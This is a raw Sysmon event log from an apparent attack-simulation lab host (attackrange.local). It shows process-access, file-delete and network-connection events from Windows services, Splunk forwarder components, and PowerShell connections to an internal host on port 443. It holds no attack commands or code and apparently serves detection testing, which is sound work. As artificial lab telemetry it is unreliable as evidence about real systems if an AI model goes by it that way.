10341000x800000000000000035128108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035128107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.153{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAF5D216028AF7665FC53F07DDDBF42C,SHA256=FD404772BC93E954ACC423B76A6BF9AE02BAE7FA2B2389AD2E3E3F446555D628,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:44.570{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62113-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:20.187{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01EEF8E9F1BDC78CD1C2400EEA131289,SHA256=36D063B7F6DD0AF12F1C6C82FE2983FA7281F5CE1F1A55176F0B1665194E3F2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:21.202{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B805E9F3DC95EEC9095C8AB6C47E60,SHA256=CEE4BE53F34DA1B9E5EB76E91AB2C3EE6327FBF4C4FF8DBD5986BD8AD8014BB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:47.383{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62114-false10.0.1.12-8000- 23542300x800000000000000035128141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:22.251{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C955C26A463CA0D2A0873DAFDA39B23,SHA256=53C89A7DACDD72C456687E157E9FC449815A09EB0F4C45575E685660E639F191,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:23.269{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C19C763E1DBB5099D9FCAFC25D7135D1,SHA256=E92D15AA032BC5D494CFD82A0607F6879DBBCF1688ACEF986CCBD1A1C8D5DA80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:24.514{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9990C8689CE58DDBFC4912C1CD1C28E1,SHA256=618A42293F7A0F6D1311848850CDBF888F5CB0617D8300AEB4E81266ED10805B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:24.314{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F126D1014F7D429F529F5104938D8728,SHA256=832D43997864CC34744C5CD399A1EB3767409616EC6DD4EC01A026E29F3A7E37,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:49.581{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62115-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:25.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=106757D09E36720897AD165AE9E21C77,SHA256=CEA945530076833691012506A7D64E0D5C88CFE800557F79D1EAD20F1E428372,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:26.828{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8346-613A-C996-03000000C801}488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:26.828{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:26.828{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:26.828{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:26.828{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:26.828{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8346-613A-C996-03000000C801}488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:26.828{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8346-613A-C996-03000000C801}488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:26.813{B81B27B7-8346-613A-C996-03000000C801}488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:26.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF152680497CF6036A1DCC71D8B28445,SHA256=14DCCB6B9047DBACC01FEDC416A5D956ED041DC0E73C3E8538C71B1E3997F9E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.668{B81B27B7-8347-613A-CA96-03000000C801}11841756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.500{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8347-613A-CA96-03000000C801}1184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.500{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.500{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.500{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.500{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.500{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8347-613A-CA96-03000000C801}1184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.500{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8347-613A-CA96-03000000C801}1184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.486{B81B27B7-8347-613A-CA96-03000000C801}1184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.385{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D9E7C1B0E59485DEBF7CDCED64D209A,SHA256=1F1D240950711CCBD86297C87C906FB54D9BD043EF0CEF4D069208A6492C6695,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.216{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95CCF6DDF80198A21E6AEB9AD3C3BC9A,SHA256=58F662C6C9ACB1B59BDE9E27D9EC64A370FA49C503679B211BFA76853514D737,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:27.216{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F0CD373A6D6F28BE16AFE475D98FE10,SHA256=C2F9986C8731D5A4DF6F23397E4E8E267986692EA42090AE373172F1DF102C7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:28.499{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95CCF6DDF80198A21E6AEB9AD3C3BC9A,SHA256=58F662C6C9ACB1B59BDE9E27D9EC64A370FA49C503679B211BFA76853514D737,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:28.400{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2CB90CEEADD103439FBB448A6509A6A,SHA256=B311105C9A6428F4F15E4F745B89E45D2CD69E8906CFFC400E273920F6FBED8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:29.648{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B02718D654D045BBE54F1E5E37CBB659,SHA256=036C7351BAA8682520D73A7A77B8B519C58BE5CA14BF7EE88A6AB440E8BDAEA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:53.328{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62116-false10.0.1.12-8000- 23542300x800000000000000035128171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:29.430{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECB0EAD60D6135E7CE005ECC1391F5AA,SHA256=8E6A406122CA3401DA363C9701C50216141F06E8060B87D7620224F65A179972,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 